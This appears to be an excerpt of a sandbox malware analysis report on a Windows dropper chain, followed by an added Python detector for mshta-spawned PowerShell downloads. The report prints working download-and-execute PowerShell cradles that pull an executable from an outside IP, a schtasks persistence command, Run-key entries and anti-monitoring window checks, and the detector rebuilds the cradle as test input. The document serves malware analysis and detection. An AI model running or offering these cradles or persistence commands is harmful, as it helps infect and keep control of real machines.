                                                Source: TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE.6.drStatic PE information: section name: entropy: 7.985706217582851
                                                Source: TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE.6.drStatic PE information: section name: vbshiqxp entropy: 7.954050962212733
                                                Source: rapes.exe.11.drStatic PE information: section name: entropy: 7.985706217582851
                                                Source: rapes.exe.11.drStatic PE information: section name: vbshiqxp entropy: 7.954050962212733
                                                Source: random[1].exe.16.drStatic PE information: section name: yououbtf entropy: 7.955647133047136
                                                Source: 7dbaa342f5.exe.16.drStatic PE information: section name: yououbtf entropy: 7.955647133047136
                                                Source: ILqcVeT[1].exe.16.drStatic PE information: section name: hbloxsmk entropy: 7.954850446877664
                                                Source: ILqcVeT.exe.16.drStatic PE information: section name: hbloxsmk entropy: 7.954850446877664
                                                Source: rXOl0pp[1].exe.16.drStatic PE information: section name: hbloxsmk entropy: 7.954850446877664
                                                Source: rXOl0pp.exe.16.drStatic PE information: section name: hbloxsmk entropy: 7.954850446877664
                                                Source: random[2].exe.16.drStatic PE information: section name: pqifeagr entropy: 7.924844514638534
                                                Source: 5a57aa51d3.exe.16.drStatic PE information: section name: pqifeagr entropy: 7.924844514638534
                                                Source: random[2].exe0.16.drStatic PE information: section name: entropy: 7.9832192045568915
                                                Source: random[2].exe0.16.drStatic PE information: section name: qqigmylm entropy: 7.954610158423588
                                                Source: f0b421a199.exe.16.drStatic PE information: section name: entropy: 7.9832192045568915
                                                Source: f0b421a199.exe.16.drStatic PE information: section name: qqigmylm entropy: 7.954610158423588
                                                Source: random[1].exe1.16.drStatic PE information: section name: entropy: 7.219744895023223
                                                Source: c105f06ef0.exe.16.drStatic PE information: section name: entropy: 7.219744895023223
                                                Source: random[3].exe.16.drStatic PE information: section name: hjgvekwy entropy: 7.953730765891355
                                                Source: 5ef8bafe70.exe.16.drStatic PE information: section name: hjgvekwy entropy: 7.953730765891355
                                                Source: random[2].exe1.16.drStatic PE information: section name: kxuwrjnk entropy: 7.951935613026697
                                                Source: df2fea7261.exe.16.drStatic PE information: section name: kxuwrjnk entropy: 7.951935613026697
                                                Source: vertualiziren[1].exe.22.drStatic PE information: section name: entropy: 7.799208910449233
                                                Source: vertualiziren[1].exe.22.drStatic PE information: section name: yuxfscdw entropy: 7.952071105223017
                                                Source: vertualiziren.exe.22.drStatic PE information: section name: entropy: 7.799208910449233
                                                Source: vertualiziren.exe.22.drStatic PE information: section name: yuxfscdw entropy: 7.952071105223017
                                                Source: benskvi.exe.24.drStatic PE information: section name: entropy: 7.799208910449233
                                                Source: benskvi.exe.24.drStatic PE information: section name: yuxfscdw entropy: 7.952071105223017
                                                Source: TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE.35.drStatic PE information: section name: entropy: 7.985706217582851
                                                Source: TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE.35.drStatic PE information: section name: vbshiqxp entropy: 7.954050962212733
                                                Source: 483d2fa8a0d53818306efeb32d3.exe.58.drStatic PE information: section name: entropy: 7.985706217582851
                                                Source: 483d2fa8a0d53818306efeb32d3.exe.58.drStatic PE information: section name: vbshiqxp entropy: 7.954050962212733
                                                Source: TempJAW3XTC7QCB11DRDHXKDZL05FSNPG4P3.EXE.67.drStatic PE information: section name: entropy: 7.985706217582851
                                                Source: TempJAW3XTC7QCB11DRDHXKDZL05FSNPG4P3.EXE.67.drStatic PE information: section name: vbshiqxp entropy: 7.954050962212733
                                                Source: random[1].exe0.16.dr, GSKpiUyewQVjl3ll2g.csHigh entropy of concatenated method names: 'N64lIWiqvs', 'y3qlLpN8VK', 'ahKlWAIBS3', 'TF7lOb8J3f', 'jgnloPbgcx', 'ra2lnByEPY', 'Gbml9SnirQ', 'XAylfpE7m9', 'wwNljlVFDW', 'qAplaZYBVp'
                                                Source: random[1].exe0.16.dr, gBMthepoZSL1ZVKpeA.csHigh entropy of concatenated method names: 'reTlcDMFua', 'nW4lBacjpc', 'sMLlkdoJ60', 'I5LlJVOMeQ', 'qdll7OAZFb', 'QEmlZSRGOw', 'NsqrSNUpN', 'N15X2cY3J', 'NWNp5BRFs', 'Q59l6jZOT'
                                                Source: acd63ce6fe.exe.16.dr, GSKpiUyewQVjl3ll2g.csHigh entropy of concatenated method names: 'N64lIWiqvs', 'y3qlLpN8VK', 'ahKlWAIBS3', 'TF7lOb8J3f', 'jgnloPbgcx', 'ra2lnByEPY', 'Gbml9SnirQ', 'XAylfpE7m9', 'wwNljlVFDW', 'qAplaZYBVp'
                                                Source: acd63ce6fe.exe.16.dr, gBMthepoZSL1ZVKpeA.csHigh entropy of concatenated method names: 'reTlcDMFua', 'nW4lBacjpc', 'sMLlkdoJ60', 'I5LlJVOMeQ', 'qdll7OAZFb', 'QEmlZSRGOw', 'NsqrSNUpN', 'N15X2cY3J', 'NWNp5BRFs', 'Q59l6jZOT'

                                                Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JAW3XTC7QCB11DRDHXKDZL05FSNPG4P3.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe File created: C:\ProgramData\mozglue.dll
Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe File created: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\TempJAW3XTC7QCB11DRDHXKDZL05FSNPG4P3.EXE
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Temp\10111240101\c70962c806.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\random[2].exe
Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\softokn3[1].dll
Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\mozglue[1].dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\softokn3[1].dll
Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\mozglue[1].dll
Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\nss3[1].dll
Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe File created: C:\ProgramData\softokn3.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Temp\10111230101\5ef8bafe70.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B8DE7T9Q\random[2].exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe File created: C:\ProgramData\nss3.dll
Source: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exe File created: C:\ProgramData\jnxnee\benskvi.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exe
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\vertualiziren[1].exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Temp\10111250101\df2fea7261.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE
Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\msvcp140[1].dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\random[3].exe
Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe File created: C:\ProgramData\freebl3.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\ILqcVeT[1].exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\nhDLtPT[1].exe
Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\vcruntime140[1].dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe
Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\nss3[1].dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\random[3].exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\rXOl0pp[1].exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Temp\10111210101\f0b421a199.exe
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe File created: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exe
Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\freebl3[1].dll
Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe File created: C:\ProgramData\msvcp140.dll
Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\msvcp140[1].dll
Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\freebl3[1].dll
Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe File created: C:\ProgramData\vcruntime140.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe
Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE File created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Temp\10111200101\5a57aa51d3.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Temp\10111050101\132fd7f0ed.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Temp\10111190101\acd63ce6fe.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\random[2].exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Temp\10111220101\c105f06ef0.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe
Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\vcruntime140[1].dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B8DE7T9Q\random[1].exe
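The mshta to powershell.exe launches recorded above are one download-and-execute cradle repeated with different drop names, and the file-created lines show where each run actually landed. In four of the variants the literal appended to `$env:temp` has no leading backslash, so PowerShell's string concatenation produces `C:\Users\user\AppData\Local\TempP9Z71...EXE` (and `...TempJAW3...`, `...TempUBI6...`), a file beside Temp rather than inside it; only the `'\483d2fa8a0d53818306efeb32d3.exe'` variant lands in Temp. A hunt that only scans %TEMP% misses the first form. The following Python is an added example, not code from the Joe Sandbox report or from the sample: it flags a scripting host spawning a PowerShell whose command line both downloads and launches something, pulls out the URL, and predicts the drop path by emulating the concatenation. The events are constructed from the report's command lines; the two control events, the parent list and the keyword patterns are assumptions of this example, not something the report states.

```python
import ntpath
import re
from dataclasses import dataclass
from typing import List, Optional

# Sample process-creation events, hand-built from the sandbox evidence above
# (parent image, child image, command line). They are constructed input for
# this example, not telemetry exported from the report.
TEMP = r"C:\Users\user\AppData\Local\Temp"
PS64 = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PS32 = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"


def cradle(literal: str) -> str:
    """Rebuild the one-liner the report shows, varying only the drop-name literal."""
    return (f'"{PS64}" -WindowStyle Hidden '
            f"$d=$env:temp+'{literal}';"
            "(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);"
            "Start-Process $d;")


EVENTS = [
    {"parent": r"C:\Windows\SysWOW64\mshta.exe", "image": PS32,
     "cmdline": cradle("P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE")},
    {"parent": r"C:\Windows\SysWOW64\mshta.exe", "image": PS32,
     "cmdline": cradle(r"\483d2fa8a0d53818306efeb32d3.exe")},
    # control (constructed): mshta spawning PowerShell with no download primitive
    {"parent": r"C:\Windows\System32\mshta.exe", "image": PS64,
     "cmdline": f'"{PS64}" -Command Get-Date'},
    # control (constructed): interactive PowerShell started from Explorer
    {"parent": r"C:\Windows\explorer.exe", "image": PS64,
     "cmdline": f'"{PS64}" -NoProfile'},
]

# Parents that should essentially never launch a downloading PowerShell (assumed list).
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "rundll32.exe",
                "regsvr32.exe", "msiexec.exe"}
DOWNLOAD = re.compile(r"DownloadFile|DownloadString|DownloadData|Invoke-WebRequest"
                      r"|\biwr\b|\bcurl\b|\bwget\b|Start-BitsTransfer", re.I)
EXECUTE = re.compile(r"Start-Process|\bsaps\b|Invoke-Expression|\biex\b|Invoke-Item", re.I)
URL = re.compile(r"""https?://[^\s'"(),;]+""", re.I)
TEMP_CONCAT = re.compile(r"\$env:temp\s*\+\s*'([^']*)'", re.I)


@dataclass
class Finding:
    parent: str
    url: Optional[str]
    drop_path: Optional[str]
    inside_temp: bool
    cmdline: str


def expected_drop_path(cmdline: str, temp: str = TEMP) -> Optional[str]:
    r"""Emulate $env:temp + '<literal>'.

    PowerShell does plain string concatenation here, so a literal without a
    leading backslash lands beside Temp (...\Local\TempP9Z71...EXE), which is
    exactly what the file-created evidence above records; a literal that
    starts with '\' lands inside Temp.
    """
    m = TEMP_CONCAT.search(cmdline)
    return temp + m.group(1) if m else None


def is_download_cradle(event: dict) -> bool:
    """Script host -> PowerShell whose command line both fetches and launches."""
    parent = ntpath.basename(event["parent"]).lower()
    image = ntpath.basename(event["image"]).lower()
    cmd = event["cmdline"]
    return (parent in SCRIPT_HOSTS
            and image in {"powershell.exe", "pwsh.exe"}
            and DOWNLOAD.search(cmd) is not None
            and EXECUTE.search(cmd) is not None)


def analyze(events: List[dict], temp: str = TEMP) -> List[Finding]:
    findings = []
    for ev in events:
        if not is_download_cradle(ev):
            continue
        url = URL.search(ev["cmdline"])
        drop = expected_drop_path(ev["cmdline"], temp)
        inside = bool(drop) and drop.lower().startswith(temp.lower() + "\\")
        findings.append(Finding(ev["parent"], url.group(0) if url else None,
                                drop, inside, ev["cmdline"]))
    return findings


if __name__ == "__main__":
    for f in analyze(EVENTS):
        where = "inside Temp" if f.inside_temp else "beside Temp (missing separator)"
        print(f"{ntpath.basename(f.parent)} -> powershell fetches {f.url} to {f.drop_path} [{where}]")
```

The parent/child pairing is what keeps this rule quiet on an administrator's console: the control events show that a plain PowerShell from mshta without a fetch, or a fetch from a non-script-host parent, is not reported. When porting to a SIEM, key the drop-path check on the real profile path of the affected user rather than the sandbox's `C:\Users\user`.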

                                                Boot Survival

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 132fd7f0ed.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am_no.cmd
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe Window searched: window name: Regmonclass
Source: C:\ProgramData\jnxnee\benskvi.exe Window searched: window name: FilemonClass
Source: C:\ProgramData\jnxnee\benskvi.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\ProgramData\jnxnee\benskvi.exe Window searched: window name: RegmonClass
Source: C:\ProgramData\jnxnee\benskvi.exe Window searched: window name: FilemonClass
Source: C:\ProgramData\jnxnee\benskvi.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\ProgramData\jnxnee\benskvi.exe Window searched: window name: Regmonclass
Source: C:\ProgramData\jnxnee\benskvi.exe Window searched: window name: Filemonclass
Source: C:\ProgramData\jnxnee\benskvi.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\ProgramData\jnxnee\benskvi.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn bseb5ma1dDD /tr "mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE File created: C:\Windows\Tasks\rapes.job
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
